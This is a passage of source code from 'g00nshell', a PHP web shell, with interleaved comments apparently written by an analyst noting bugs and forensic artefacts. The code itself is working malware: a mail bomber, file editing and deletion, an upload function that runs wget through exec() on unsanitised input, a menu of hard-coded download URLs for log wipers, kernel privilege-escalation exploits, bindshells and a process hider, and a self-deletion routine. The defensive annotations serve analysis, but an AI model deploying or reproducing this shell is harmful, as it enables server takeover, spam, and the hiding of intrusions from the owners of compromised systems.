674           case "none": @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</font></a>"; break;
675           default: @$file['link'] = "<a href='?act=view&f=" . $link . "&dir=$dir'><font color='red'>$link</a></font>"; break;
676         }
    // Icon selection by extension. "h" is listed twice; the second case is redundant.
677         switch($ext){
678         case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
679         case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
680         case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
681         case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
682         case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
683         case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
684         default: $file['icon'] = "unknown"; break;
685         }
686         if($_SERVER['QUERY_STRING']){$file = "<tr><td><img src='?" . $_SERVER['QUERY_STRING'] . "&img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "</td><td>" . $file['size'] . "</td></tr>\n";}
687         else{$file = "<tr><td><img src='?img=" . $file['icon']. "' height='18' width='18'> " . $file['link'] . "<td>" . $file['size'] . "</td></tr>\n";}
688         array_push($files, $file);
689       }
690     }
691   foreach($folders as $folder){echo("<tr><td>$folder</td><td>DIR</td></tr>\n");}
692   foreach($files as $file){echo($file);}
693   echo("</table>");
694   closedir($handle);
695   }
696 }
697 function email(){ // Email bomber function
    // Sends the same message $times times via mail(). The loop bound comes straight from the
    // POST body with no cap, and $from is placed verbatim in the "From:" header, so a value
    // containing newlines injects additional headers. Messages leave through the server's
    // own MTA, so MTA logs are the artefact to check. The file-level set_time_limit(5)
    // bounds how long this can run per request.
698   $times = $_POST['times'];
699   $to = $_POST['to'];
700   $subject = $_POST['subject'];
701   $body = $_POST['body'];
702   $from = $_POST['from'];
703   style();
704   echo("<h2>Mail Bomber</h2>
705   <form method='POST' action='?act=email'>
706   <b>Your address:</b><br>
707   <input name='from' type='text' size='35'><br>
708   <b>Their address:</b><br>
709   <input name='to' type='text' size='35'><br>
710   <b>Subject:</b><br>
711   <input name='subject' type='text' size='35'><br>
712   <b>Text:</b><br>
713   <input name='body' type='text' size='35'><br>
714   <b>How many times:</b><br>
715   <input name='times' type='text' size='5'><br><br>
716   <input name='submit' type='submit' value='Submit'>
717   </form>");
718   if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
719 }
720 function view($filename, $dir){ // File view function
    // File viewer/editor. On GET, $dir."/".$filename is read into a textarea whose form
    // posts back with f=<full path> and dir=<dir>; the Save/Delete/Download branches below
    // therefore operate on $filename exactly as received (the already-joined path). If a
    // POST arrives with none of those actions (e.g. Save with an empty textarea) the path
    // is joined with $dir a second time and the read below fails.
721   if($_POST['fileact'] == "Download"){
722     header("Content-type: application/octet-stream");
723     header("Content-length: ".strlen($_POST['contents']));
    // Content-Length is the size of the posted textarea text, not of the file streamed
    // below; the two differ whenever the file was edited or contains CRLFs.
724     header("Content-disposition: attachment; filename=" . basename($filename) . ";");
725     $handle = fopen($filename, "r");
726     echo(fread($handle, filesize($filename)));
727     die(); // $handle is never closed
728   }
729   style();
730   if($_POST['contents'] && $_POST['fileact'] == "Save"){
731     $handle = fopen($filename, 'w');
732     fwrite($handle, stripslashes($_POST['contents'])); // stripslashes undoes magic_quotes_gpc
733     fclose($handle);
734     echo("Saved file.<br><br>");
735     echo("<a href='?act=view&f=$filename&dir=nullz'>Go back</a>");
    // dir=nullz tells the next view() call that $f already holds the full path.
736     die();
737   }
738   elseif($_POST['fileact'] == "Delete"){
739     unlink($filename);
740     echo("Deleted file.<br><br>");
741     echo("<a href='?act=files'>Go back</a>");
742     die();
743   }
744   if($dir != "nullz"){ // heh
745     $filename = $dir."/".$filename;
746   }
747   $bad = array("<", ">");
748   $good = array("<", ">");
    // $bad and $good are identical as shown here, so the str_replace below is a no-op and the
    // file content is echoed into the textarea unescaped; a "</textarea>" inside the file
    // breaks out of it. (Possibly an HTML-entity replacement lost in transcription — verify
    // against the original sample.)
749   $file = fopen($filename, 'r');
750   $content = fread($file, @filesize($filename)); // $file is never closed
751   echo("<form name='file' method='POST' action='?act=view&dir=$dir&f=$filename'>");
752   echo("<textarea style='width:100%; height:92%;' name='contents'>");
753   echo(str_replace($bad, $good, $content)."\n");
754   echo("</textarea>");
755   echo("<input name='fileact' type='submit' value='Save'>");
756   echo("<input name='fileact' type='submit' value='Delete'>");
757   echo("<input name='fileact' type='submit' value='Download'>");
758   echo("</form>");
759 }
760 function edit($file, $contents){ // File edit function
    // Overwrites $file with $contents. Not called anywhere in the source shown here — view()
    // carries its own Save branch — so this appears to be a leftover from an earlier version.
761   style();
762   $handle = fopen($file, 'w');
763   fwrite($handle, $contents);
764   fclose($handle);
765   echo("Saved file.<br><br>");
766   echo("<a href='?act=files'>Go back</a>");
767 }
768 function upload(){ // Uploading frontend function
    // Upload page: a remote URL is fetched by grab() (wget), a local file is stored by up();
    // both write into the directory given in the "loc" field. grab() always dies, so up() is
    // only reached when "rem" is empty. Note that $_FILES['up'] is populated (with an error
    // code) even when no file was chosen, so a bare submit still calls up().
769   global $curdir;
770   style();
771   echo("<form name='files' enctype='multipart/form-data' method='POST'>
772   <b>Output Directory</b><br>
773   <input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>
774   <b>Remote Upload</b><br>
775   <input type='text' name='rem' size='65'>
776   <input type='submit' value='Grab'><br><br>
777   <b>Local File Upload</b><br>
778   <input name='up' type='file' size='65'>
779   <input type='submit' value='Upload'>
780   </form><br>");
781   if($_POST['rem']){grab($_POST['rem']);}
782   if($_FILES['up']){up($_FILES['up']);}
783 }
784 function up($up){ // Uploading backend function
    // Moves the uploaded temp file to <loc>/<original client-supplied name>. Neither the
    // directory nor the name is validated, and the return value of move_uploaded_file() is
    // ignored, so "File has been uploaded." is printed whether or not the move succeeded.
785   style();
786   $updir = $_POST['loc'];
787   move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
788   die("File has been uploaded.");
789 }
790 function grab($file){ // Uploading backend function
    // Fetches $file with wget into <loc>/<last URL path segment>. Both the URL and the
    // destination are interpolated unquoted into the command line. "-b" backgrounds wget,
    // so exec() returns as soon as wget has forked; the truthiness test below reflects only
    // whether wget printed a line (its "Continuing in background" notice), not whether the
    // download succeeded. Backgrounded wget normally writes its log to a "wget-log" file in
    // the working directory — a useful artefact when triaging a compromised host.
791   style();
792   $updir = $_POST['loc'];
793   $filex = array_pop(explode("/", $file));
794   if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
795   else{die("File upload failed.");}
796 }
797 function tools(){ // Useful tools function
    // Post-exploitation download menu: hard-coded URLs for log wipers, local privilege-
    // escalation exploits for old Linux/BSD kernels, bindshells, a SOCKS proxy and a process
    // hider. The selected URL is posted as "gf", which the dispatcher hands to grab(). The
    // "---" separator entries are selectable too and would be passed to grab() as the URL
    // "1".."4". Outbound requests to these hosts from a web server are themselves an
    // indicator worth alerting on.
798   global $curdir;
799   style();
800   $tools = array(
801   "--- Log wipers ---"=>"1",
802   "Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
803   "Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
804   "gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
805   "--- Priv Escalation ---"=>"2",
806   "h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
807   "k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
808   "raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
809   "rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
810   "--- Bindshells ---"=>"3",
811   "THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
812   "Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
813   "--- Misc ---"=>"4",
814   "MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
815   "xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
816   $names = array_flip($tools);
817   echo("<b>Tools:</b>");
818   echo("<form method='post'>");
819   echo("<b>Output Directory</b><br>");
820   echo("<input type='text' name='loc' size='65' value='" . $curdir . "'><br><br>");
821   echo("<select name='gf' style='align:center;'>");
822   foreach($tools as $tool) {echo("<option value='" . $tool . "'>" . $names[$tool] . "</option>\n");}
823   echo("</select>");
824   echo("<br><input type='submit' value='Grab'>");
825   echo("</form>");
826 }
827 function lookup(){ // Domain lookup function
    // Reverse-IP lookup of the current host via a third-party web service. Writes a small
    // Python 2 script (urllib2/xrange/print statement) to lookup.py in the web server's
    // working directory, runs it, prints the result list and deletes the script. The host
    // argument is $servinf[0], i.e. the client-supplied Host header, interpolated unquoted
    // into the command line. The outbound request to seologs.com and a transient lookup.py
    // in the web root are the observable artefacts.
828   style();
829   global $servinf;
830   $script = "import urllib, urllib2, sys, re
831   req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
832   site = re.findall('.+\) (.+)<br>', urllib2.urlopen(req).read())
833   for i in xrange(0,len(site)):
834     print site[i]"; // My sexy python script
835   $handle = fopen('lookup.py', 'w');
836   fwrite($handle, $script);
837   fclose($handle);
838   echo("<h4>Domains</h4>");
839   echo("<ul>"); // the <ul> is never closed
840   $cmd = exec("python lookup.py " . $servinf[0], $ret);
841   foreach($ret as $site){echo("<li>" . $site . "\n");}
842   unlink('lookup.py');
843 }
844 function img($img){ // Images function
      // Serves one of the embedded file-type icons as a GIF and then ends the
      // request. Every value below is base64; the shared "R0lGODlh" prefix
      // decodes to the "GIF89a" signature, so these blobs are inline icon
      // images rather than code. Because they are static and long, they also
      // make a usable fingerprint when scanning for this file on disk.
      // $img selects the icon by key and is not validated: an unknown key
      // reads an undefined index and base64_decode(null) produces an empty
      // body. Where $img comes from is not visible in this block.
845   $images = array(
846   "folder"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAA" .
847   "gALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwq" .
848   "d1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
849   "image"=>"R0lGODlhFAAWAOMAAP////8zM8z//8zMzJmZmWZmZmYAADMzMwCZzACZMwAzZgAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
850   "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
851   "ZXIgMTk5NQAh+QQBAAACACwAAAAAFAAWAAAEkPDISae4WBzAu99Hdm1eSYYZWXYqOgJBLAcDoNrYNssGsBy/4GsX6y" .
852   "2OyMWQ2OMQngSlBjZLWBM1AFSqkyU4A2tWywUMYt/wlTSIvgYGA/Zq3QwU7mmHvh4g8GUsfAUHCH95NwMHV4SGh4Ed" .
853   "ihOOjy8rZpSVeiV+mYCWHncKo6Sfm5cliAdQrK1PQBlJsrNSEQA7",
854   "unknown"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
855   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
856   "AAADaDi6vPEwDECrnSO+aTvPEQcIAmGaIrhR5XmKgMq1LkoMN7ECrjDWp52r0iPpJJ0KjUAq7SxLE+sI+9V8vycFiM" .
857   "0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=",
858   "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
859   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
860   "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4VJdOWkx2XvirUgq" .
861   "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7",
862   "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH+TlRoaX" .
863   "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1i" .
864   "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2HnTBsccvhAmGtXAy" .
865   "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f317WwdSi4xRPxlw" .
866   "kUgXEQA7",
867   "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" .
868   "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/" .
869   "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmc" .
870   "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZ" .
871   "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAG" .
872   "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZm" .
873   "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmT" .
874   "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMA" .
875   "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAA" .
876   "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AALsAAKoAAIgAAHcA" .
877   "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARA" .
878   "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMg" .
879   "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAAkACwAAAAAFA" .
880   "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D+VHAFZiWmmZ8BGH" .
881   "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnkup/gMq1mdamC1tdn" .
882   "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7",
883   "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
884   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAACACwAAAAAFAAW" .
885   "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE4ZnF6hCqn0iryKs" .
886   "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=",
887   "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG" .
888   "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBAAABACwAAAAAFAAW" .
889   "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYVM0dNS/AF7gGy1me" .
890   "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs=");
      // Sent as an image and then die(), so no HTML from the rest of the
      // shell follows the GIF bytes. Requests for this endpoint therefore
      // look like ordinary image fetches in access logs, apart from the query
      // string that selects the icon.
891   header('Content-type: image/gif');
892   echo base64_decode($images[$img]);
893   die();
894 }
895 function kill(){ // Shell deleter function
      // Self-removal: renders a confirmation form and, once the POSTed 'ver'
      // field equals "confirm", unlinks this script by its own basename.
      // The path is relative, so the call assumes the process CWD is still
      // the script's directory (other parts of the file work with $curdir;
      // whether they chdir() is not visible here). For responders this is
      // anti-forensic behaviour: copy or image the webroot before interacting
      // with the page, since a successful call removes the primary artifact,
      // and watch for unlink() of .php files by the web-server user.
896   style();
897   echo("<form  method='post'>");
      // 'action' is set on the <input>, not the <form>, so it has no effect;
      // the form simply posts back to the current URL.
898   echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
899   echo("<input type='submit' value='Delete'>");
900   echo("</form>");
      // $_POST['ver'] is read without isset(), so a plain GET that renders
      // the form raises an undefined-index notice before the comparison.
901   if($_POST['ver'] == "confirm"){
902     $self = basename($_SERVER['PHP_SELF']);
      // unlink() failure (permissions, CWD elsewhere) is reported only as
      // "Failed"; the actual error is not surfaced.
903     if(unlink($self)){echo("Deleted");}
904     else{echo("Failed");}
905   }
906 }
907 die(); // Terminates the request here; nothing after this line is ever sent.
908 ?>

g00nshell Script Screenshot

g00nshell script screenshot